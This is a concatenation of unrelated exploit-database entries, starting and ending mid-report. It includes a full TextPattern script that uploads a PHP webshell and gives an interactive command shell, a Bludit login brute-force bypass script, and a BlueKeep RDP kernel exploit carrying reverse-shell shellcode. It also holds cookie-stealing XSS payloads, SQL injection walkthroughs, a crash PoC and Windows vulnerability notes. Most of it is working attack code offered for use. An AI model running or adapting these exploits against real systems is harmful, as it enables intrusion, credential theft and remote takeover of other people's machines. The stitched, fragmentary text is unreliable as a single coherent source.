You could just restrict it to a very limited set of scenarios, but again you risk bypasses due to mistakes in the checks.
Proof of Concept:
See the separate reports for PoCs for various issues I identified. The source for all PoCs is attached to this issue.
After looking again at the implementation of the unmarshaler there is a check in DfUnmarshalInterface for the caller being in an AC using the IMarshalingStream::GetMarshalingContextAttribute method which ultimately tries to impersonate the caller and check if the impersonation token is an AC or not.
Quick update on RS5, as this was also discovered internal to Microsoft (I believe). There has been changes to the unmarshaler in three ways:
1) A check is now performed on the owner of the section from its security descriptor which must now match the current process' user.
2) All classes now have a GUID associated with them which is verified before trusting the data from the shared section.
3) Addition of bounds checking on structure data size.
1 isn't that hard to bypass, although the PoC provided won't as it gets a section from the Audio Service which is running as LOCAL SERVICE. 2 and 3only matters for the cases where we we're trying to read out of bounds such as issue 1645 . Microsoft will apparently be fixing RS5 as well and won't be backporting this changes verbatim to prior versions as it wouldn't be possible in some cases (such as 1 not working on Windows 7). This does look in many ways like a non-backported fix, even if it doesn't really fix much. Due to the opaqueness of MSRC it's hard to confirm or deny that they weren't going to fix down level at some point.
Fixed in https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8550.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45893.zip
# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
# Date: 6/23/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
# Version: 1.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# Click any link and app will crash
buffer = "A" * 2000
payload = buffer
try:
f = open("PoC.txt", "w")
print("[+] Creating payload..")
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created")
# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection
# Google Dork:unknown
# Date: 2019-09-01
# Exploit Author: Punt
# Vendor Homepage: https://www.librenms.org
# Software Link: https://www.librenms.org
# Version:1.46 and less
# Tested on:Linux and Windows
# CVE: N/A
#Affected Device: more than 4k found on Shodan and Censys.
#Description about the bug
Vunlerable script /html/ajax_serarch.php
if (isset($_REQUEST['search'])) {
$search = mres($_REQUEST['search']);
header('Content-type: application/json');
if (strlen($search) > 0) {
$found = 0;
if ($_REQUEST['type'] == 'group') {
include_once '../includes/device-groups.inc.php';
foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) {
if ($_REQUEST['map']) {
$results[] = array(
'name' => 'g:'.$group['name'],
'group_id' => $group['id'],
as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST['']
dbFetchRows() used to exectute sql query
now lets check the mres() function
the mres() fuction is located under /includes/common.php
function mres($string)
{
return $string; //
global $database_link;
return mysqli_real_escape_string($database_link, $string);
as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'
#POC:
1st lgoin to your LibreNMS
2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules
3rd you will see an sql syntax error
The Librenms team have applyed a patch .
Thanks
Punt (From Ethiopia)
# Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS)
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3
The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL).
Stored XSS:
The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser.
Below I have provided an example request were the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page.
POST /ckeditor/plugins/pdw_file_browser/actions.php
HTTP/1.1 Host: <HOSTNAME>
[…]
action=rename&new_filename=<svg+onload=alert(document.cookie
s)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&typ
e=file
Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_spe
cs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)%
3E&type=file
Happy Hacking :^)
# Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/24
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Vulnerable Pages:
http://localhost/healthcare/Users/registration.php
http://localhost/healthcare/Doctor/doctor_registration.php
Proof of Concept:
1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload.
2 - And check user/doctor account on admin panel or http://localhost/healthcare/admin/user_detail.php?id=<userid> adres.
#!/usr/bin/python3
# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
# Google Dork: N/A
# Date: 16/10/2020
# Exploit Author: Michele '0blio_' Cisternino
# Vendor Homepage: https://textpattern.com/
# Software Link: https://github.com/textpattern/textpattern
# Version: <= 4.8.3
# Tested on: Kali Linux x64
# CVE: N/A
import sys
import json
import requests
from bs4 import BeautifulSoup as bs4
from time import sleep
import random
import string
import readline
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Simple Terminal User Interface class I wrote to print run-time logs and headers
class Tui ():
def __init__ (self):
self.red = '\033[91m'
self.green = '\033[92m'
self.blue = '\033[94m'
self.yellow = '\033[93m'
self.pink = '\033[95m'
self.end = '\033[0m'
self.bold = '\033[1m'
def header (self, software, author, cve='N/A'):
print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
print ("{}CVE:{} {}".format(self.pink, self.end, cve))
print ("{}Author:{} {}\n".format(self.pink, self.end, author))
def info (self, message):
print ("[{}*{}] {}".format(self.blue, self.end, message))
def greatInfo (self, message):
print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))
def success (self, message):
print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))
def warning (self, message):
print ("[{}!{}] {}".format(self.yellow, self.end, message))
def error (self, message):
print ("[{}✗{}] {}".format(self.red, self.end, message))
log = Tui()
log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")
if len(sys.argv) < 4:
log.info ("USAGE: python3 exploit.py http://target.com username password")
log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
sys.exit()
# Get input from the command line
target, username, password = sys.argv[1:4]
# Fixing URL
target = target.strip()
if not target.startswith("https://") and not target.startswith("http://"):
target = "http://" + target
if not target.endswith("/"):
target = target + "/"
accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}
# Login
log.info ("Authenticating to the target as '{}'".format(username))
s = requests.Session()
try:
r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
sleep(1)
if r.status_code == 200:
log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
sleep(1)
# Parsing the response to find the upload token inside the main json array
log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
soup = bs4(r.text, 'html.parser')
scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
scriptJS = json.loads(scriptJS)
uploadToken = scriptJS['_txp_token']
log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))
# The server reply with a 401 with the user provide wrong creds as input
elif r.status_code == 401:
log.error ("Unable to login. You provided wrong credentials..\n")
sys.exit()
except requests.exceptions.ConnectionError:
log.error ("Unable to connect to the target!")
sys.exit()
# Crafting the upload request here
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
"Accept-Encoding" : "gzip, deflate",
"X-Requested-With" : "XMLHttpRequest",
"Connection" : "close",
}
# Generating random webshell name
randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'
# Mapping multiparts here
multipart_form_data = {
"fileInputOrder" : (None, '1/1'),
"app_mode" : (None, 'async'),
"MAX_FILE_SIZE" : (None, '2000000'),
"event" : (None, 'file'),
"step" : (None, 'file_insert'),
"id" : (None, ' '),
"_txp_token" : (None, uploadToken), # Token here
"thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol
}
# Uploading the webshell
log.warning ("Sending payload..")
try:
r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
if "Files uploaded" in r.text:
log.success ("Webshell uploaded successfully as {}".format(randomFilename))
except:
log.error ("Unexpected error..")
sys.exit()
sleep(2)
# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
log.greatInfo ("Interacting with the HTTP webshell..")
sleep (1)
print()
while 1:
try:
cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
if cmd == 'exit':
raise KeyboardInterrupt
r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
print (r.text)
except KeyboardInterrupt:
log.warning ("Stopped.")
exit()
except:
log.error ("Unexpected error..")
sys.exit()
print()
#!/usr/bin/python3
# Exploit
## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
## Author: ColdFusionX (Mayank Deshmukh)
## Author website: https://coldfusionx.github.io
## Date: 2020-10-19
## Vendor Homepage: https://www.bludit.com/
## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
## Version: <= 3.9.2
# Vulnerability
## Discoverer: Rastating
## Discoverer website: https://rastating.github.io/
## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240
## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
## Patch: https://github.com/bludit/bludit/pull/1090
'''
Example Usage:
- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
'''
import requests
import sys
import re
import argparse, textwrap
from pwn import *
#Expected Arguments
parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)")
parser.add_argument("-u","--userlist", help="Username Dictionary")
parser.add_argument("-p","--passlist", help="Password Dictionary")
args = parser.parse_args()
if len(sys.argv) < 2:
print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
sys.exit(1)
# Variable
LoginPage = args.url
Username_list = args.userlist
Password_list = args.passlist
log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')
def login(Username,Password):
session = requests.session()
r = session.get(LoginPage)
# Progress Check
process = log.progress('Brute Force')
#Getting CSRF token value
CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
CSRF = CSRF.group(1)
#Specifying Headers Value
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Referer' : f"{LoginPage}",
'X-Forwarded-For' : f"{Password}"
}
#POST REQ data
postreqcontent = {
'tokenCSRF' : f"{CSRF}",
'username' : f"{Username}",
'password' : f"{Password}"
}
#Sending POST REQ
r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)
#Printing Username:Password
process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))
#Conditional loops
if 'Location' in r.headers:
if "/admin/dashboard" in r.headers['Location']:
print()
log.info(f'SUCCESS !!')
log.success(f"Use Credential -> {Username}:{Password}")
sys.exit(0)
elif "has been blocked" in r.text:
log.failure(f"{Password} - Word BLOCKED")
#Reading User.txt & Pass.txt files
userfile = open(Username_list).readlines()
for Username in userfile:
Username = Username.strip()
passfile = open(Password_list).readlines()
for Password in passfile:
Password = Password.strip()
login(Username,Password)
# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages
Step 2: use payload <script>alert(document.cookie)</script> in Package Name and Description field
Malicious Request
POST /gym/gym/ajax.php?action=save_package HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710
Content-Length: 587
Origin: http://localhost
Connection: close
Referer: http://localhost/gym/gym/index.php?page=packages
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="id"
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="package"
<script>alert(document.cookie)</script>
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="description"
<script>alert(document.cookie)</script>
-----------------------------10391575234966392972740129710
Content-Disposition: form-data; name="amount"
1
-----------------------------10391575234966392972740129710--
Step 3: Cookie will be reflected each time someone visits the Packages section.
#Exploit Title: Point of Sales 1.0 - SQL Injection
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4
Proof of Concept:::
Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1
Step 2: Change the URL http://localhost:8081/pos/edit_category.php?id=1'
Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+
Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+
Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+
Malicious Request:::
GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1
Gives database name *sourcecodester_posdb*
# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47683.zip
import rdp
import socket
import binascii
import time
def pool_spray(s, crypter, payload):
times = 10000
count = 0
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, payload))
except ConnectionResetError:
print('ConnectionResetError pool_spray Aborting')
quit()
def main():
# change to your target
host = '192.168.0.46'
port = 3389
times = 4000
count = 0
target = (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
crypter = rdp.connect(s)
# this address was choosen for the pool spray. it could be be
# modified for potentially higher success rates.
# in my testing against the win7 VM it is around 80% success
# 0x874ff028
shellcode_address = b'\x28\xf0\x4f\x87'
# replace buf with your shellcode
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x00\x22\x68"
buf += b"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
buf += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
buf += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
# bluekeep_kshellcode_x86.asm
# ring 0 to ring 3 shellcode
shellcode = b""
shellcode += b"\x60\xe8\x00\x00\x00\x00\x5b\xe8\x26\x00\x00\x00"
shellcode += b"\xb9\x76\x01\x00\x00\x0f\x32\x8d\x7b\x3c\x39\xf8"
shellcode += b"\x74\x11\x39\x45\x00\x74\x06\x89\x45\x00\x89\x55"
shellcode += b"\x08\x89\xf8\x31\xd2\x0f\x30\x61\xf4\xeb\xfd\xc2"
shellcode += b"\x24\x00\x8d\xab\x00\x10\x00\x00\xc1\xed\x0c\xc1"
shellcode += b"\xe5\x0c\x83\xed\x50\xc3\xb9\x23\x00\x00\x00\x6a"
shellcode += b"\x30\x0f\xa1\x8e\xd9\x8e\xc1\x64\x8b\x0d\x40\x00"
shellcode += b"\x00\x00\x8b\x61\x04\x51\x9c\x60\xe8\x00\x00\x00"
shellcode += b"\x00\x5b\xe8\xcb\xff\xff\xff\x8b\x45\x00\x83\xc0"
shellcode += b"\x17\x89\x44\x24\x24\x31\xc0\x99\x42\xf0\x0f\xb0"
shellcode += b"\x55\x08\x75\x12\xb9\x76\x01\x00\x00\x99\x8b\x45"
shellcode += b"\x00\x0f\x30\xfb\xe8\x04\x00\x00\x00\xfa\x61\x9d"
shellcode += b"\xc3\x8b\x45\x00\xc1\xe8\x0c\xc1\xe0\x0c\x2d\x00"
shellcode += b"\x10\x00\x00\x66\x81\x38\x4d\x5a\x75\xf4\x89\x45"
shellcode += b"\x04\xb8\x78\x7c\xf4\xdb\xe8\xd3\x00\x00\x00\x97"
shellcode += b"\xb8\x3f\x5f\x64\x77\x57\xe8\xc7\x00\x00\x00\x29"
shellcode += b"\xf8\x89\xc1\x3d\x70\x01\x00\x00\x75\x03\x83\xc0"
shellcode += b"\x08\x8d\x58\x1c\x8d\x34\x1f\x64\xa1\x24\x01\x00"
shellcode += b"\x00\x8b\x36\x89\xf2\x29\xc2\x81\xfa\x00\x04\x00"
shellcode += b"\x00\x77\xf2\x52\xb8\xe1\x14\x01\x17\xe8\x9b\x00"
shellcode += b"\x00\x00\x8b\x40\x0a\x8d\x50\x04\x8d\x34\x0f\xe8"
shellcode += b"\xcb\x00\x00\x00\x3d\x5a\x6a\xfa\xc1\x74\x0e\x3d"
shellcode += b"\xd8\x83\xe0\x3e\x74\x07\x8b\x3c\x17\x29\xd7\xeb"
shellcode += b"\xe3\x89\x7d\x0c\x8d\x1c\x1f\x8d\x75\x10\x5f\x8b"
shellcode += b"\x5b\x04\xb8\x3e\x4c\xf8\xce\xe8\x61\x00\x00\x00"
shellcode += b"\x8b\x40\x0a\x3c\xa0\x77\x02\x2c\x08\x29\xf8\x83"
shellcode += b"\x7c\x03\xfc\x00\x74\xe1\x31\xc0\x55\x6a\x01\x55"
shellcode += b"\x50\xe8\x00\x00\x00\x00\x81\x04\x24\x92\x00\x00"
shellcode += b"\x00\x50\x53\x29\x3c\x24\x56\xb8\xc4\x5c\x19\x6d"
shellcode += b"\xe8\x25\x00\x00\x00\x31\xc0\x50\x50\x50\x56\xb8"
shellcode += b"\x34\x46\xcc\xaf\xe8\x15\x00\x00\x00\x85\xc0\x74"
shellcode += b"\xaa\x8b\x45\x1c\x80\x78\x0e\x01\x74\x07\x89\x00"
shellcode += b"\x89\x40\x04\xeb\x9a\xc3\xe8\x02\x00\x00\x00\xff"
shellcode += b"\xe0\x60\x8b\x6d\x04\x97\x8b\x45\x3c\x8b\x54\x05"
shellcode += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\x49"
shellcode += b"\x8b\x34\x8b\x01\xee\xe8\x1d\x00\x00\x00\x39\xf8"
shellcode += b"\x75\xf1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
shellcode += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24"
shellcode += b"\x1c\x61\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01"
shellcode += b"\xc2\x85\xc0\x75\xf6\x92\x5a\xc3\x58\x89\x44\x24"
shellcode += b"\x10\x58\x59\x58\x5a\x60\x52\x51\x8b\x28\x31\xc0"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x99\xb0\x40\x50\xc1\xe0"
shellcode += b"\x06\x50\x54\x52\x89\x11\x51\x4a\x52\xb8\xea\x99"
shellcode += b"\x6e\x57\xe8\x7b\xff\xff\xff\x85\xc0\x75\x4f\x58"
shellcode += b"\x8b\x38\xe8\x00\x00\x00\x00\x5e\x83\xc6\x55\xb9"
shellcode += b"\x00\x04\x00\x00\xf3\xa4\x8b\x45\x0c\x50\xb8\x48"
shellcode += b"\xb8\x18\xb8\xe8\x56\xff\xff\xff\x8b\x40\x0c\x8b"
shellcode += b"\x40\x14\x8b\x00\x66\x83\x78\x24\x18\x75\xf7\x8b"
shellcode += b"\x50\x28\x81\x7a\x0c\x33\x00\x32\x00\x75\xeb\x8b"
shellcode += b"\x58\x10\x89\x5d\x04\xb8\x5e\x51\x5e\x83\xe8\x32"
shellcode += b"\xff\xff\xff\x59\x89\x01\x31\xc0\x88\x45\x08\x40"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x61\xc3\x5a\x58\x58\x59"
shellcode += b"\x51\x51\x51\xe8\x00\x00\x00\x00\x83\x04\x24\x09"
shellcode += b"\x51\x51\x52\xff\xe0\x31\xc0"
shellcode += buf
print('shellcode len: %d' % len(shellcode))
payload_size = 1600
payload = b'\x2c\xf0\x4f\x87' + shellcode
payload = payload + b'\x5a' * (payload_size - len(payload))
print('[+] spraying pool')
pool_spray(s, crypter, payload)
fake_obj_size = 168
call_offset = 108
fake_obj = b'\x00'*call_offset + shellcode_address
fake_obj = fake_obj + b'\x00' * (fake_obj_size - len(fake_obj))
time.sleep(.5)
print('[+] sending free')
s.sendall(rdp.free_32(crypter))
time.sleep(.15)
print('[+] allocating fake objects')
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, fake_obj))
except ConnectionResetError:
s.close()
s.close()
if __name__== "__main__":
main()
-----=====[ Background ]=====-----
The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
-----=====[ Description ]=====-----
We have encountered the following crash in fontsub!MergeFonts:
--- cut ---
(5f7c.29fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FONTSUB!MergeFonts+0x774:
00007fff`aa53b214 413944cd00 cmp dword ptr [r13+rcx*8],eax ds:0000018a`014e8000=????????
0:000> ? r13
Evaluate expression: 1692239036224 = 0000018a`014e7f40
0:000> ? rcx
Evaluate expression: 24 = 00000000`00000018
0:000> ? eax
Evaluate expression: 1191239935 = 00000000`4700e0ff
0:000> dd r13 r13+18*8-1
0000018a`014e7f40 68656164 c18e145a 000000cc 00000036
0000018a`014e7f50 68686561 0bde01ea 00000104 00000024
0000018a`014e7f60 6d617870 0666d833 00000128 00000020
0000018a`014e7f70 686d7478 4872344e 00000148 0000016a
0000018a`014e7f80 636d6170 4079c39a 000002b4 00000996
0000018a`014e7f90 676c7966 4ec7e46c 00000c4c 00009e8c
0000018a`014e7fa0 6c6f6361 a4f67e41 0000aad8 00000166
0000018a`014e7fb0 45424454 fe7d185f 0000b148 00000145
0000018a`014e7fc0 45424c43 1babe979 0000ac40 00000508
0000018a`014e7fd0 62646174 fe7d185f 0000b798 00000145
0000018a`014e7fe0 626c6f63 1babe979 0000b290 00000508
0000018a`014e7ff0 64747466 74f237b6 0000b8e0 00000176
0:000> !heap -p -a r13
address 0000018a014e7f40 found in
_DPH_HEAP_ROOT @ 18a01001000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
18a0100f068: 18a014e7f40 c0 - 18a014e7000 2000
unknown!printable
00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
00007fffb4efbe42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
00007fffcca398f0 msvcrt!malloc+0x0000000000000070
00007fffaa53fd1e FONTSUB!Mem_Alloc+0x0000000000000012
00007fffaa53abbd FONTSUB!MergeFonts+0x000000000000011d
00007fffaa53baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
00007fffaa5314b2 FONTSUB!MergeFontPackage+0x0000000000000132
[...]
0:000> k
# Child-SP RetAddr Call Site
00 00000079`dc4fd910 00007fff`aa53baac FONTSUB!MergeFonts+0x774
01 00000079`dc4fdac0 00007fff`aa5314b2 FONTSUB!MergeDeltaTTF+0x3ec
02 00000079`dc4fdc00 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
[...]
--- cut ---
The root cause of the crash seems to be an out-of-bounds access to an array storing SFNT table headers.
The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process heap. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47084.zip
-----=====[ Background ]=====-----
